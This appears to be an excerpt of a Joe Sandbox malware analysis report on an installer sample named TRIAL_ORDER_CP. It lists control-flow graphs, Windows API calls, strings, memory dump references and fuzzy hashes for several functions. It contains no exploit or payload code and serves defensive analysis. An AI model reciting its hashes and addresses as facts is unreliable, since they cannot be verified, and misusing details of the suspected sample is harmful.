                                          control_flow_graph 684 406591-40659a 685 40659c-4065ab 684->685 686 4065ad-4065c7 684->686 685->686 687 4067d7-4067dd 686->687 688 4065cd-4065d9 686->688 690 4067e3-4067f0 687->690 691 4065eb-4065f8 687->691 688->687 689 4065df-4065e6 688->689 689->687 693 4067f2-4067f7 call 406554 690->693 694 4067fc-4067ff 690->694 691->690 692 4065fe-406607 691->692 695 4067c4 692->695 696 40660d-406650 692->696 693->694 698 4067d2-4067d5 695->698 699 4067c6-4067d0 695->699 700 406656-406662 696->700 701 406768-40676c 696->701 698->687 699->687 702 406664 700->702 703 40666c-40666e 700->703 704 4067a0-4067a4 701->704 705 40676e-406775 701->705 702->703 710 406670-40668e call 406422 703->710 711 4066a8-4066ab 703->711 706 4067b4-4067c2 lstrlenW 704->706 707 4067a6-4067af call 406591 704->707 708 406785-406791 call 406554 705->708 709 406777-406783 call 40649b 705->709 706->687 707->706 723 406796-40679c 708->723 709->723 722 406693-406696 710->722 712 4066ad-4066b9 GetSystemDirectoryW 711->712 713 4066be-4066c1 711->713 718 40674b-40674e 712->718 719 4066d3-4066d7 713->719 720 4066c3-4066cf GetWindowsDirectoryW 713->720 725 406760-406766 call 406802 718->725 726 406750-406753 718->726 719->718 727 4066d9-4066f7 719->727 720->719 722->726 728 40669c-4066a3 call 406591 722->728 723->706 724 40679e 723->724 724->725 725->706 726->725 729 406755-40675b lstrcatW 726->729 731 4066f9-4066ff 727->731 732 40670b-406717 call 406948 727->732 728->718 729->725 737 406707-406709 731->737 740 40671f-406723 732->740 737->732 739 406745-406749 737->739 739->718 741 406725-406738 SHGetPathFromIDListW CoTaskMemFree 740->741 742 40673a-406743 740->742 741->739 741->742 742->727 742->739
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 004066C9
                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                          • CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 00406730
                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 0040675B
                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 004067B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4024019347-2097564478
                                          • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                          • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E
                                          Function 004055D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 743 4055d9-4055ee 744 4055f4-405605 743->744 745 4056a5-4056a9 743->745 746 405610-40561c lstrlenW 744->746 747 405607-40560b call 406591 744->747 749 405639-40563d 746->749 750 40561e-40562e lstrlenW 746->750 747->746 752 40564c-405650 749->752 753 40563f-405646 SetWindowTextW 749->753 750->745 751 405630-405634 lstrcatW 750->751 751->749 754 405652-405694 SendMessageW * 3 752->754 755 405696-405698 752->755 753->752 754->755 755->745 756 40569a-40569d 755->756 756->745
                                          APIs
                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405611
                                          • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405621
                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405634
                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll), ref: 00405646
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405686
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll
                                          • API String ID: 2531174081-2701989606
                                          • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                          • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8
                                          Function 004032D9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 757 4032d9-4032f0 758 4032f2 757->758 759 4032f9-403302 757->759 758->759 760 403304 759->760 761 40330b-403310 759->761 760->761 762 403320-40332d call 4034d1 761->762 763 403312-40331b call 4034e7 761->763 767 403333-403337 762->767 768 4034bf 762->768 763->762 769 40346a-40346c 767->769 770 40333d-403363 GetTickCount 767->770 771 4034c1-4034c2 768->771 772 4034ac-4034af 769->772 773 40346e-403471 769->773 774 4034c7 770->774 775 403369-403371 770->775 776 4034ca-4034ce 771->776 777 4034b1 772->777 778 4034b4-4034bd call 4034d1 772->778 773->774 779 403473 773->779 774->776 780 403373 775->780 781 403376-403384 call 4034d1 775->781 777->778 778->768 791 4034c4 778->791 784 403476-40347c 779->784 780->781 781->768 790 40338a-403393 781->790 787 403480-40348e call 4034d1 784->787 788 40347e 784->788 787->768 794 403490-40349c call 4060f6 787->794 788->787 793 403399-4033b9 call 406aa3 790->793 791->774 799 403462-403464 793->799 800 4033bf-4033d2 GetTickCount 793->800 801 403466-403468 794->801 802 40349e-4034a8 794->802 799->771 803 4033d4-4033dc 800->803 804 40341d-40341f 800->804 801->771 802->784 805 4034aa 802->805 806 4033e4-403415 MulDiv wsprintfW call 4055d9 803->806 807 4033de-4033e2 803->807 808 403421-403425 804->808 809 403456-40345a 804->809 805->774 816 40341a 806->816 807->804 807->806 812 403427-40342e call 4060f6 808->812 813 40343c-403447 808->813 809->775 810 403460 809->810 810->774 817 403433-403435 812->817 815 40344a-40344e 813->815 815->793 818 403454 815->818 816->804 817->801 819 403437-40343a 817->819 818->774 819->815
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%$STy
                                          • API String ID: 551687249-2882605797
                                          • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                          • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA
                                          Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 820 4068d8-4068f8 GetSystemDirectoryW 821 4068fa 820->821 822 4068fc-4068fe 820->822 821->822 823 406900-406909 822->823 824 40690f-406911 822->824 823->824 825 40690b-40690d 823->825 826 406912-406945 wsprintfW LoadLibraryExW 824->826 825->826
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                          • wsprintfW.USER32 ref: 0040692A
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME
                                          • API String ID: 2200240437-1106614640
                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98
                                          Function 70681817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 827 70681817-70681856 call 70681bff 831 7068185c-70681860 827->831 832 70681976-70681978 827->832 833 70681869-70681876 call 70682480 831->833 834 70681862-70681868 call 7068243e 831->834 839 70681878-7068187d 833->839 840 706818a6-706818ad 833->840 834->833 843 70681898-7068189b 839->843 844 7068187f-70681880 839->844 841 706818cd-706818d1 840->841 842 706818af-706818cb call 70682655 call 70681654 call 70681312 GlobalFree 840->842 848 7068191e-70681924 call 70682655 841->848 849 706818d3-7068191c call 70681666 call 70682655 841->849 865 70681925-70681929 842->865 843->840 850 7068189d-7068189e call 70682e23 843->850 846 70681888-70681889 call 70682b98 844->846 847 70681882-70681883 844->847 861 7068188e 846->861 853 70681890-70681896 call 70682810 847->853 854 70681885-70681886 847->854 848->865 849->865 858 706818a3 850->858 864 706818a5 853->864 854->840 854->846 858->864 861->858 864->840 869 7068192b-70681939 call 70682618 865->869 870 70681966-7068196d 865->870 877 7068193b-7068193e 869->877 878 70681951-70681958 869->878 870->832 875 7068196f-70681970 GlobalFree 870->875 875->832 877->878 879 70681940-70681948 877->879 878->870 880 7068195a-70681965 call 706815dd 878->880 879->878 881 7068194a-7068194b FreeLibrary 879->881 880->870 881->878
                                          APIs
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E74
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E79
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 706818C5
                                          • FreeLibrary.KERNEL32(?), ref: 7068194B
                                          • GlobalFree.KERNEL32(00000000), ref: 70681970
                                            • Part of subcall function 7068243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7068246F
                                            • Part of subcall function 70682810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70681896,00000000), ref: 706828E0
                                            • Part of subcall function 70681666: wsprintfW.USER32 ref: 70681694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                          • String ID:
                                          • API String ID: 3962662361-3916222277
                                          • Opcode ID: dc459d145fb0410a3e8e06f140093215237e80c9026ee1c2efc48123a606c590
                                          • Instruction ID: 679e1d26d1c74e8d00a9a125de36a28ccc654ad205eea3a138e0b953e8dce8bf
                                          • Opcode Fuzzy Hash: dc459d145fb0410a3e8e06f140093215237e80c9026ee1c2efc48123a606c590
                                          • Instruction Fuzzy Hash: DF41B1F2400205AFCF119F24DDB9BCD37BDAF04310F144469FA46AE2CAEBB494848764
                                          Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 884 406073-40607f 885 406080-4060b4 GetTickCount GetTempFileNameW 884->885 886 4060c3-4060c5 885->886 887 4060b6-4060b8 885->887 889 4060bd-4060c0 886->889 887->885 888 4060ba 887->888 888->889
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00406091
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-944333549
                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768
                                          Function 00406422 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 890 406422-406454 call 4063c1 893 406492 890->893 894 406456-406484 RegQueryValueExW RegCloseKey 890->894 896 406496-406498 893->896 894->893 895 406486-40648a 894->895 895->896 897 40648c-406490 895->897 897->893 897->896
                                          APIs
                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
                                          • RegCloseKey.KERNELBASE(?,?,?), ref: 00406473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: Call
                                          • API String ID: 3356406503-1824292864
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4
                                          Function 70681058 Relevance: 4.6, APIs: 3, Instructions: 55memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GlobalSize.KERNEL32(00000000), ref: 706810AA
                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 706810B9
                                          • GlobalFree.KERNEL32(00000000), ref: 706810D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$AllocFreeSize
                                          • String ID:
                                          • API String ID: 465308736-0
                                          • Opcode ID: 9def485e03fd74ec4405220c08ece85bfa5d60a30a3f7f5be2c864759947e060
                                          • Instruction ID: f6baa4488325d2e770d7588d8f55ac30a28499132d8714945248db6e4312c9a6
                                          • Opcode Fuzzy Hash: 9def485e03fd74ec4405220c08ece85bfa5d60a30a3f7f5be2c864759947e060
                                          • Instruction Fuzzy Hash: BA0152F35007056FC711AFB66C7995F77ED9B882107104126FA09DB3C0EE7499814A65
